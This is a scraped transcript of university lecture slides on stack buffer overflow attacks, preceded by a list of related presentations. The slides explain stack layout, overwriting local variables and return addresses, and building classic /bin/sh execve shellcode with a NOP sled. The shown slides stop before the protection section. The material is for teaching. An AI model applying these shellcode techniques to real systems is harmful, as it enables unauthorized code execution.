Buffer Overflow Attacks 1 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security.

Slides:



Advertisements
Similar presentations
Recitation 4 Outline Buffer overflow –Practical skills for Lab 3 Code optimization –Strength reduction –Common sub-expression –Loop unrolling Reminders.
Advertisements

Buffer Overflow Prabhaker Mateti Wright State University.
Smashing the Stack for Fun and Profit
Recitation 4: 09/30/02 Outline The Stack! Essential skill for Lab 3 –Out-of-bound array access –Put your code on the stack Annie Luo
Recitation 8 – 3/25/02 Outline Dynamic Linking Review prior test questions 213 Course Staff Office Hours: See Posting.
Buffer Overflows and Defenses
University of Washington Last Time For loops  for loop → while loop → do-while loop → goto version  for loop → while loop → goto “jump to middle” version.
Foundations of Network and Computer Security J J ohn Black Lecture #29 Nov 12 th 2007 CSCI 6268/TLEN 5831, Fall 2007.
1 Function Calls Professor Jennifer Rexford COS 217 Reading: Chapter 4 of “Programming From the Ground Up” (available online from the course Web site)
Buffer Overflow. Process Memory Organization.
Windows XP SP2 Stack Protection Jimmy Hermansson Johan Tibell.
Foundations of Network and Computer Security J J ohn Black Lecture #17 Oct 26 th 2004 CSCI 6268/TLEN 5831, Fall 2004.
Foundations of Network and Computer Security J J ohn Black Lecture #18 Oct 28 th 2004 CSCI 6268/TLEN 5831, Fall 2004.
Foundations of Network and Computer Security J J ohn Black Lecture #19 Nov 3 rd 2005 CSCI 6268/TLEN 5831, Fall 2005.
Assembly תרגול 8 פונקציות והתקפת buffer.. Procedures (Functions) A procedure call involves passing both data and control from one part of the code to.
Foundations of Network and Computer Security J J ohn Black Lecture #28 Nov 9 th 2009 CSCI 6268/TLEN 5550, Fall 2009.
Foundations of Network and Computer Security J J ohn Black Lecture #30 Nov 13 th 2009 CSCI 6268/TLEN 5550, Fall 2009.
September 22, 2014 Pengju (Jimmy) Jin Section E
Foundations of Network and Computer Security J J ohn Black Lecture #18 Nov 1 st 2005 CSCI 6268/TLEN 5831, Fall 2005.
Attacks Using Stack Buffer Overflow Boxuan Gu
Recitation 2: Assembly & gdb Andrew Faulring Section A 16 September 2002.
Security Exploiting Overflows. Introduction r See the following link for more info: operating-systems-and-applications-in-
Lecture 6: Buffer Overflow CS 436/636/736 Spring 2014 Nitesh Saxena *Adopted from a previous lecture by Aleph One (Smashing the Stack for Fun and Profit)
University of Washington Today Memory layout Buffer overflow, worms, and viruses 1.
CrackChat #2 Stack Overflows and Format Strings Part 2: Baking the Egg
University of Washington Today More on procedures, stack etc. Lab 2 due today!  We hope it was fun! What is a stack?  And how about a stack frame? 1.
Recitation 4: The Stack & Lab3 Andrew Faulring Section A 30 September 2002.
1 #include void silly(){ char s[30]; gets(s); printf("%s\n",s); } main(){ silly(); return 0; }
Automatic Diagnosis and Response to Memory Corruption Vulnerabilities Presenter: Jianyong Dai Jun Xu, Peng Ning, Chongkyung Kil, Yan Zhai, Chris Bookhot.
University of Washington Today Happy Monday! HW2 due, how is Lab 3 going? Today we’ll go over:  Address space layout  Input buffers on the stack  Overflowing.
Recitation 2 – 2/11/02 Outline Stacks & Procedures Homogenous Data –Arrays –Nested Arrays Mengzhi Wang Office Hours: Thursday.
Recitation 2: Outline Assembly programming Using gdb L2 practice stuff Minglong Shao Office hours: Thursdays 5-6PM Wean Hall.
Smashing the Stack Overview The Stack Region Buffer Overflow
CS216: Program and Data Representation University of Virginia Computer Science Spring 2006 David Evans Lecture 22: Unconventional.
Overflows & Exploits. In the beginning 11/02/1988 Robert Morris, Jr., a graduate student in Computer Science at Cornell, wrote an experimental, self-replicating,
Lecture 8: Buffer Overflow CS 436/636/736 Spring 2013 Nitesh Saxena *Adopted from a previous lecture by Aleph One (Smashing the Stack for Fun and Profit)
Stack-based buffer overflows Yves Younan DistriNet, Department of Computer Science Katholieke Universiteit Leuven Belgium
1 Understanding Pointers Buffer Overflow. 2 Outline Understanding Pointers Buffer Overflow Suggested reading –Chap 3.10, 3.12.
International Summer School on Information and System Security Stack Based Buffer Overflows Alberto Ornaghi Lorenzo Cavallaro.
Buffer Overflow Attack- proofing of Code Binaries Ramya Reguramalingam Gopal Gupta Gopal Gupta Department of Computer Science University of Texas at Dallas.
November 2008Buffer Overflow1 King Mongkut’s University of Technology Faculty of Information Technology Network Security Winter 2008 Prof. Reuven Aviv.
CS642: Computer Security X86 Review Process Layout, ISA, etc. Drew Davidson
1 Assembly Language: Function Calls Jennifer Rexford.
Recitation 3 Outline Recursive procedure Complex data structures –Arrays –Structs –Unions Function pointer Reminders Lab 2: Wed. 11:59PM Lab 3: start early.
CSC 382: Buffer OverflowsSlide #1 Topics 1.What is a Buffer Overflow? 2.The Most Common Implementation Flaw. 3.Process Memory Layout. 4.The Stack and C’s.
Analyzing C/C++ Vulnerabilities -- Mike Gerschefske.
Basic of Buffer Over Flow
Buffer Overflow Buffer overflows are possible because C doesn’t check array boundaries Buffer overflows are dangerous because buffers for user input are.
Recitation 3: Procedures and the Stack
CS 177 Computer Security Lecture 9
Introduction to Information Security
C function call conventions and the stack
The Hardware/Software Interface CSE351 Winter 2013
Exploiting & Defense Day 2 Recap
Recitation 2 – 2/11/02 Outline Stacks & Procedures
Homework In-line Assembly Code Machine Language
Recitation 2 – 2/4/01 Outline Machine Model
Assembly Language Programming V: In-line Assembly Code
Chapter 3 Machine-Level Representation of Programs
Y86 Processor State Program Registers
Machine-Level Programming 4 Procedures
Defeating Instruction Set Randomization Nora Sovarel
Assembly Language Programming II: C Compiler Calling Sequences
Machine-Level Representation of Programs III
Lecture 9: Buffer Overflow*
Machine Level Representation of Programs (IV)
Machine-Level Programming: Introduction
Foundations of Network and Computer Security
Chapter 3 Machine-Level Representation of Programs
Instructors: Majd Sakr and Khaled Harras
Presentation transcript:

Buffer Overflow Attacks 1 Basic Idea Sample Attacks Protection , Computer & Network Security

History 2 Basic Idea Sample Attacks Protection , Computer & Network Security 1960s1970s1990sToday1980s Vulnerability exploited on time-share machines Attacks on early networked machines Morris Worm uses buffer overflow in taking down significant portion of the Internet Buffer overflow attacks become (arguably) the most pressing security concerns facing the web (e..g., in 1998, 2/3 of CERT advisories were buffer overflow related) The problem persists (e.g., IE VML advisory from two months ago).

Memory Layout 3 Basic Idea Sample Attacks Protection , Computer & Network Security Text Data Heap Stack High Addresses Low Addresses

Memory Layout 4 Basic Idea Sample Attacks Protection , Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; } void main() { func(1,2); }

Memory Layout 5 Basic Idea Sample Attacks Protection , Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; } void main() { func(1,2); } pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $24, %esp

Memory Layout 6 Basic Idea Sample Attacks Protection , Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; } void main() { func(1,2); } pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $24, %esp sp fp

Memory Layout 7 Basic Idea Sample Attacks Protection , Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; } void main() { func(1,2); } pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $24, %esp sp fp 2

Memory Layout 8 Basic Idea Sample Attacks Protection , Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; } void main() { func(1,2); } pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $24, %esp sp fp 2 1

Memory Layout 9 Basic Idea Sample Attacks Protection , Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; } void main() { func(1,2); } pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $24, %esp sp fp 2 1 ret

Memory Layout 10 Basic Idea Sample Attacks Protection , Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; } void main() { func(1,2); } pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $24, %esp sp fp 2 1 ret sfp

Memory Layout 11 Basic Idea Sample Attacks Protection , Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; } void main() { func(1,2); } pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $24, %esp sp fp 2 1 ret sfp

Memory Layout 12 Basic Idea Sample Attacks Protection , Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; } void main() { func(1,2); } pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $24, %esp sp fp 2 1 ret sfp

Memory Layout 13 Basic Idea Sample Attacks Protection , Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; } void main() { func(1,2); } pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $24, %esp sp fp 2 1 ret sfp buffer

Memory Layout 14 Basic Idea Sample Attacks Protection , Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; strcpy(buffer, bigstr); } sp fp 2 1 ret sfp buffer

Memory Layout 15 Basic Idea Sample Attacks Protection , Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; strcpy(buffer, bigstr); } sp fp 2 1 ret sfp bigstr

Sample Attacks 16 Basic Idea Sample Attacks Protection , Computer & Network Security  Modify local variables  Modify return address to skip/repeat code  Modify return address to run evil code

Modify Local Variables 17 Basic Idea Sample Attacks Protection , Computer & Network Security  Modify local variables  Modify return address to skip/repeat code  Modify return address to run evil code

Modify Local Variables 18 Basic Idea Sample Attacks Protection , Computer & Network Security void handleRequest() { int code; char subject[] = "[[[SECRET]]] user request"; char recp[] = char query[8]; strcpy(query, getenv("QUERY_STRING")); //send top secret to recp … } void handleRequest() { int code; char subject[] = "[[[SECRET]]] user request"; char recp[] = char query[8]; strcpy(query, getenv("QUERY_STRING")); //send top secret to recp … }

Modify Local Variables 19 Basic Idea Sample Attacks Protection , Computer & Network Security void handleRequest() { int code; char subject[] = "[[[SECRET]]] user request"; char recp[] = char query[8]; strcpy(query, getenv("QUERY_STRING")); //send top secret to recp … } void handleRequest() { int code; char subject[] = "[[[SECRET]]] user request"; char recp[] = char query[8]; strcpy(query, getenv("QUERY_STRING")); //send top secret to recp … } ret sfp query subject[] recp[]

Modify Local Variables 20 Basic Idea Sample Attacks Protection , Computer & Network Security void handleRequest() { int code; char subject[] = "[[[SECRET]]] user request"; char recp[] = char query[8]; strcpy(query, getenv("QUERY_STRING")); //send top secret to recp … } void handleRequest() { int code; char subject[] = "[[[SECRET]]] user request"; char recp[] = char query[8]; strcpy(query, getenv("QUERY_STRING")); //send top secret to recp … } ret sfp query subject[] recp[]

Modify Local Variables 21 Basic Idea Sample Attacks Protection , Computer & Network Security void handleRequest() { int code; char subject[] = "[[[SECRET]]] user request"; char recp[] = char query[8]; strcpy(query, getenv("QUERY_STRING")); //send top secret to recp … } void handleRequest() { int code; char subject[] = "[[[SECRET]]] user request"; char recp[] = char query[8]; strcpy(query, getenv("QUERY_STRING")); //send top secret to recp … } ret sfp subject[] recp[] query

Modify Local Variables 22 Basic Idea Sample Attacks Protection , Computer & Network Security void handleRequest() { int code; char subject[] = "[[[SECRET]]] user request"; char recp[] = char query[8]; strcpy(query, getenv("QUERY_STRING")); //send top secret to recp … } void handleRequest() { int code; char subject[] = "[[[SECRET]]] user request"; char recp[] = char query[8]; strcpy(query, getenv("QUERY_STRING")); //send top secret to recp … } ret sfp subject[] recp[] query Demo…

Repeat Code… 23 Basic Idea Sample Attacks Protection , Computer & Network Security  Modify local variables  Modify return address to skip/repeat code  Modify return address to run evil code

Repeat Code… 24 Basic Idea Sample Attacks Protection , Computer & Network Security b a ret sfp buffer void func(int a, int b) { printf("Inside func loop.\n"); char buffer[4]; gets(buffer); } main() { printf("about to call func.\n"); func(5,6); printf("done.\n"); } void func(int a, int b) { printf("Inside func loop.\n"); char buffer[4]; gets(buffer); } main() { printf("about to call func.\n"); func(5,6); printf("done.\n"); }

Repeat Code… 25 Basic Idea Sample Attacks Protection , Computer & Network Security b a ret sfp buffer void func(int a, int b) { printf("Inside func loop.\n"); char buffer[4]; gets(buffer); } main() { printf("about to call func.\n"); func(5,6); printf("done.\n"); } void func(int a, int b) { printf("Inside func loop.\n"); char buffer[4]; gets(buffer); } main() { printf("about to call func.\n"); func(5,6); printf("done.\n"); }

Repeat Code… 26 Basic Idea Sample Attacks Protection , Computer & Network Security b a ret sfp void func(int a, int b) { printf("Inside func loop.\n"); char buffer[4]; gets(buffer); } main() { printf("about to call func.\n"); func(5,6); printf("done.\n"); } void func(int a, int b) { printf("Inside func loop.\n"); char buffer[4]; gets(buffer); } main() { printf("about to call func.\n"); func(5,6); printf("done.\n"); } addr

Repeat Code… 27 Basic Idea Sample Attacks Protection , Computer & Network Security b a ret sfp void func(int a, int b) { printf("Inside func loop.\n"); char buffer[4]; gets(buffer); } main() { printf("about to call func.\n"); func(5,6); printf("done.\n"); } void func(int a, int b) { printf("Inside func loop.\n"); char buffer[4]; gets(buffer); } main() { printf("about to call func.\n"); func(5,6); printf("done.\n"); } buffer

Repeat Code… 28 Basic Idea Sample Attacks Protection , Computer & Network Security b a ret sfp void func(int a, int b) { printf("Inside func loop.\n"); char buffer[4]; gets(buffer); } main() { printf("about to call func.\n"); func(5,6); printf("done.\n"); } void func(int a, int b) { printf("Inside func loop.\n"); char buffer[4]; gets(buffer); } main() { printf("about to call func.\n"); func(5,6); printf("done.\n"); } addr

Repeat Code… 29 Basic Idea Sample Attacks Protection , Computer & Network Security b a ret sfp void func(int a, int b) { printf("Inside func loop.\n"); char buffer[4]; gets(buffer); } main() { printf("about to call func.\n"); func(5,6); printf("done.\n"); } void func(int a, int b) { printf("Inside func loop.\n"); char buffer[4]; gets(buffer); } main() { printf("about to call func.\n"); func(5,6); printf("done.\n"); } addr Demo…

Sample Attacks 30 Basic Idea Sample Attacks Protection , Computer & Network Security  Modify local variables  Modify return address to skip/repeat code  Modify return address to run evil code

Running Evil Code… 31 Basic Idea Sample Attacks Protection , Computer & Network Security 2 1 ret sfp buffer void func(int a, int b) { char buffer[32]; gets(buffer); … } void func(int a, int b) { char buffer[32]; gets(buffer); … }

Running Evil Code… 32 Basic Idea Sample Attacks Protection , Computer & Network Security 2 1 void func(int a, int b) { char buffer[32]; gets(buffer); … } void func(int a, int b) { char buffer[32]; gets(buffer); … } evil code evil code nop nop nop nop nop nop nop nop nop nop nop 0x80483eb

Running Evil Code… 33 Basic Idea Sample Attacks Protection , Computer & Network Security 2 1 void func(int a, int b) { char buffer[32]; gets(buffer); … } void func(int a, int b) { char buffer[32]; gets(buffer); … } evil code evil code nop nop nop nop nop nop nop nop nop nop nop 0x80483eb

Running Evil Code… 34 Basic Idea Sample Attacks Protection , Computer & Network Security 2 1 void func(int a, int b) { char buffer[32]; gets(buffer); … } void func(int a, int b) { char buffer[32]; gets(buffer); … } evil code evil code nop nop nop nop nop nop nop nop nop nop nop 0x80483eb

Running Evil Code… 35 Basic Idea Sample Attacks Protection , Computer & Network Security 2 1 void func(int a, int b) { char buffer[32]; gets(buffer); … } void func(int a, int b) { char buffer[32]; gets(buffer); … } evil code evil code nop nop nop nop nop nop nop nop nop nop nop 0x80483eb

Running Evil Code… 36 Basic Idea Sample Attacks Protection , Computer & Network Security 2 1 void func(int a, int b) { char buffer[32]; gets(buffer); … } void func(int a, int b) { char buffer[32]; gets(buffer); … } evil code evil code nop nop nop nop nop nop nop nop nop nop nop 0x80483eb ????

void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 37 Basic Idea Sample Attacks Protection , Computer & Network Security

void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 38 Basic Idea Sample Attacks Protection , Computer & Network Security movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880

void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 39 Basic Idea Sample Attacks Protection , Computer & Network Security movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 0xffffffff

void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 40 Basic Idea Sample Attacks Protection , Computer & Network Security movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 0xffffffff 0x80884a8 0xfffffff8 “/bin/sh”

void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 41 Basic Idea Sample Attacks Protection , Computer & Network Security movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 0xffffffff 0x80884a8 0xfffffff8 NULL 0xfffffffc

void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 42 Basic Idea Sample Attacks Protection , Computer & Network Security movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 0xffffffff 0x80884a8 0xfffffff8 NULL 0xfffffffc name

void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 43 Basic Idea Sample Attacks Protection , Computer & Network Security movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 movl $0x80884a8,0xfffffff8(%ebp) movl $0x0,0xfffffffc(%ebp) push $0x0 lea 0xfffffff8(%ebp),%eax push %eax pushl 0xfffffff8(%ebp) call 0x804d880 0xffffffff 0x80884a8 0xfffffff8 NULL 0xfffffffc NULL 0xfffffff8 0x80884a8

void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 44 Basic Idea Sample Attacks Protection , Computer & Network Security 0xffffffff 0x80884a8 0xfffffff8 NULL 0xfffffffc NULL 0x80884a8 0xfffffff8 ret sfp fp (ebp)

void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 45 Basic Idea Sample Attacks Protection , Computer & Network Security 0xffffffff 0x80884a8 0xfffffff8 NULL 0xfffffffc NULL ret sfp fp (ebp) mov 0x8(%ebp),%ebx mov 0xc(%ebp),%ecx mov 0x10(%ebp),%edx mov $0xb,%eax int $0x80 mov 0x8(%ebp),%ebx mov 0xc(%ebp),%ecx mov 0x10(%ebp),%edx mov $0xb,%eax int $0x80 ebx 0x80884a8 0xfffffff8

void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 46 Basic Idea Sample Attacks Protection , Computer & Network Security 0xffffffff 0x80884a8 0xfffffff8 NULL 0xfffffffc NULL ret sfp fp (ebp) mov 0x8(%ebp),%ebx mov 0xc(%ebp),%ecx mov 0x10(%ebp),%edx mov $0xb,%eax int $0x80 mov 0x8(%ebp),%ebx mov 0xc(%ebp),%ecx mov 0x10(%ebp),%edx mov $0xb,%eax int $0x80 ebx ecx 0x80884a8 0xfffffff8

void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 47 Basic Idea Sample Attacks Protection , Computer & Network Security 0xffffffff 0x80884a8 0xfffffff8 NULL 0xfffffffc NULL ret sfp fp (ebp) mov 0x8(%ebp),%ebx mov 0xc(%ebp),%ecx mov 0x10(%ebp),%edx mov $0xb,%eax int $0x80 mov 0x8(%ebp),%ebx mov 0xc(%ebp),%ecx mov 0x10(%ebp),%edx mov $0xb,%eax int $0x80 ebx ecx edx 0x80884a8 0xfffffff8

void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 48 Basic Idea Sample Attacks Protection , Computer & Network Security 0xffffffff 0x80884a8 0xfffffff8 NULL 0xfffffffc NULL ret sfp fp (ebp) mov 0x8(%ebp),%ebx mov 0xc(%ebp),%ecx mov 0x10(%ebp),%edx mov $0xb,%eax int $0x80 mov 0x8(%ebp),%ebx mov 0xc(%ebp),%ecx mov 0x10(%ebp),%edx mov $0xb,%eax int $0x80 ebx ecx edx 0x80884a8 0xfffffff8

void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } Running Evil Code… 49 Basic Idea Sample Attacks Protection , Computer & Network Security 0xffffffff 0x80884a8 0xfffffff8 NULL 0xfffffffc NULL ret sfp fp (ebp) mov 0x8(%ebp),%ebx mov 0xc(%ebp),%ecx mov 0x10(%ebp),%edx mov $0xb,%eax int $0x80 mov 0x8(%ebp),%ebx mov 0xc(%ebp),%ecx mov 0x10(%ebp),%edx mov $0xb,%eax int $0x80 ebx ecx edx 0x80884a8 0xfffffff8

Running Evil Code… 50 Basic Idea Sample Attacks Protection , Computer & Network Security ret sfp fp (ebp) movl string_addr,0x8 movl $0x0,0xc movl $0xb,%eax movl string_addr,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 movl string_addr,0x8 movl $0x0,0xc movl $0xb,%eax movl string_addr,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80

Running Evil Code… 51 Basic Idea Sample Attacks Protection , Computer & Network Security ret sfp fp (ebp) movl string_addr,0x8 movl $0x0,0xc movl $0xb,%eax movl string_addr,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 movl string_addr,0x8 movl $0x0,0xc movl $0xb,%eax movl string_addr,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 string_addr NULL ecx ebx edx 0x8

Running Evil Code… 52 Basic Idea Sample Attacks Protection , Computer & Network Security ret sfp movl string_addr,0x8 movl $0x0,0xc movl $0xb,%eax movl string_addr,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 movl string_addr,0x8 movl $0x0,0xc movl $0xb,%eax movl string_addr,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 string_addr NULL ??????

Running Evil Code… 53 Basic Idea Sample Attacks Protection , Computer & Network Security ret sfp jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string

Running Evil Code… 54 Basic Idea Sample Attacks Protection , Computer & Network Security ret sfp jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string “bin/sh” code

Running Evil Code… 55 Basic Idea Sample Attacks Protection , Computer & Network Security ret sfp jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string “bin/sh” code

Running Evil Code… 56 Basic Idea Sample Attacks Protection , Computer & Network Security ret sfp jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string “bin/sh” code addr of “bin/sh”

Running Evil Code… 57 Basic Idea Sample Attacks Protection , Computer & Network Security ret sfp jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string “bin/sh” code addr of “bin/sh” esi

Running Evil Code… 58 Basic Idea Sample Attacks Protection , Computer & Network Security ret sfp jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string “bin/sh” code

Running Evil Code… 59 Basic Idea Sample Attacks Protection , Computer & Network Security ret sfp jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string Obstacle #1: Zero Bytes

Running Evil Code… 60 Basic Idea Sample Attacks Protection , Computer & Network Security ret sfp jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string Obstacle #1: Zero Bytes Solution: Generate on the fly (e.g., push $0x0 = xor %eax, %eax push %eax )

Running Evil Code… 61 Basic Idea Sample Attacks Protection , Computer & Network Security ret sfp jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string Obstacle #2: Guessing the Return Address code ret’ ret’ ret’

